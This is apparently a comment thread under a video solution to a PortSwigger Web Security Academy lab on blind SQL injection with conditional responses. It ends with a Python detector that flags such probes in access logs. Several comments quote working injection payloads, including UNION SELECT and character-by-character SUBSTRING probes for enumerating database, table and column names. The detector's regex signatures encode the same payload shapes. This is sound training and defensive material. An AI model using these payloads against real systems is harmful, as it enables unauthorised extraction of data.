This video shows the lab solution of "Blind SQL injection with conditional responses" from Web Security Academy (Portswigger) Link to the lab: portswigger.ne...
Hi Michael. Great walkthrough of the solution. I wanted to point out that you can actually execute the last series faster using a cluster bomb attack type in Burp Intruder. This allows you to add payload positions for both the substring position and the character evaluation. Then you just select number list and brute force (or simple list) for the payloads and use the grep match to locate the correct values.
Hi Michael, Thanks for the video. Is it better to pay for the Burp Pro License instead of using the community edition for the web security academy course?
Extremely helpful, thank you. I don't know what it is, but their solutions sections just confuse me a bit more than I already am lol. I'm a little confused though, so I wonder if you can answer this? Do I need to URL encode all my commands when using them through Burp itself, in Repeater let's say? I find some things will work fine without encoding and some commands won't work at all until they're encoded. So I feel like I'm spending double the time on most things working out if encoding is needed or not. An example would be:
' UNION SELECT NULL-- No encoding needed
'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables-- Can't get it to work without "URL Encode as you Type" enabled.
Thanks for any advice given.
Cool video. Check out this video tutorial link below: ru-vid.com/video/%D0%B2%D0%B8%D0%B4%D0%B5%D0%BE-bG9aKLJySDg.html The software does all the work. We're in the 21st century. Work smart, not hard 😎🤘
Because the original unmodified query would return only one row, so the modified query needed to be limited to 1 row too, else multiple rows in the result might confuse the program logic, which was expecting only a one-row result.
In this case this info was given in the question. But if you had to find them out you would have to:
1) Find out the database name. You can do it with payloads similar to:
' AND (SELECT SUBSTRING(database(), 1, 1)) = 'a
' AND (SELECT SUBSTRING(database(), 1, 1)) = 'b
[...]
2) Find out the table names:
' AND (SELECT SUBSTRING(table_name, 1, 1) FROM information_schema.tables WHERE table_schema='') = 'a
' AND (SELECT SUBSTRING(table_name, 1, 1) FROM information_schema.tables WHERE table_schema='') = 'b
[...]
3) Find out the column names:
' AND (SELECT SUBSTRING(column_name, 1, 1) FROM information_schema.columns WHERE table_name='') = 'a
' AND (SELECT SUBSTRING(column_name, 1, 1) FROM information_schema.columns WHERE table_name='') = 'b
[...]
Of course, the syntax varies with the DBMS being used. Alternatively you can use sqlmap or Burp to automate this attack.
@AUBCodeII Hi, thanks for giving useful insight on this. However, when I try to do this using this tutorial I did get the db name as 'postgres', but could not get the table and column names. Is there anything missing in the syntax?
@steneer6789 Hey. These payloads were designed for MySQL. PostgreSQL requires a slightly different syntax. I tried to include a link to a cheat sheet from PentestMonkey, but RU-vid keeps blocking my comments.
@AUBCodeII Oh ok, will check on that, because from what I read in the cheat sheet provided by the lab it seems MySQL, Microsoft and Postgres use the same syntax for this.
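An added example (not code from the video, the lab, or any commenter): a small Python detector that URL-decodes query parameters and flags the substring-oracle and information_schema payload shapes quoted in the comments above, then counts flagged requests per client, since extracting data one character at a time produces bursts of near-identical requests. The log lines and the `category` parameter as injection point are constructed for this example.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (Common Log Format); the "category"
# query parameter as injection point is a hypothetical choice for this example.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /filter?category=Gifts HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /filter?category=Gifts%27+AND+(SELECT+SUBSTRING(database(),1,1))%3D%27a HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /filter?category=Gifts%27+AND+(SELECT+SUBSTRING(database(),1,1))%3D%27b HTTP/1.1" 200 488',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /filter?category=Gifts%27+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables-- HTTP/1.1" 500 0',
    '10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /filter?category=Pets+and+more HTTP/1.1" 200 511',
]

REQUEST_LINE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')

# Payload shapes quoted in the thread, matched on decoded, whitespace-folded text.
SIGNATURES = {
    "boolean_substring_probe": re.compile(r"'\s*AND\s*\(\s*SELECT\s+SUBSTRING\s*\(", re.I),
    "schema_enumeration": re.compile(r"INFORMATION_SCHEMA\.(TABLES|COLUMNS)", re.I),
    "union_select": re.compile(r"'\s*UNION\s+SELECT\b", re.I),
}

def decoded_params(target):
    """Return (name, value) query pairs with %XX escapes and '+' decoded."""
    # parse_qsl decodes '+' to a space and %27 to a quote; matching the raw
    # request target instead would miss every encoded probe.
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)

def classify(value):
    """Return the names of every signature the decoded value matches."""
    folded = " ".join(value.split())
    return [name for name, rx in SIGNATURES.items() if rx.search(folded)]

def scan_log(lines):
    """Return (ip, param, signatures) for each request carrying a flagged value."""
    findings = []
    for line in lines:
        m = REQUEST_LINE.match(line)
        if not m:
            continue
        for param, value in decoded_params(m["target"]):
            hits = classify(value)
            if hits:
                findings.append((m["ip"], param, hits))
    return findings

def probe_counts(findings):
    """Flagged requests per client: one-character-at-a-time extraction needs many."""
    return Counter(ip for ip, _, _ in findings)
```

Run `scan_log(SAMPLE_LOG)` to list the flagged requests; only the client sending the decoded probes is reported, and the benign value with a literal `+` (`Pets and more`) is not.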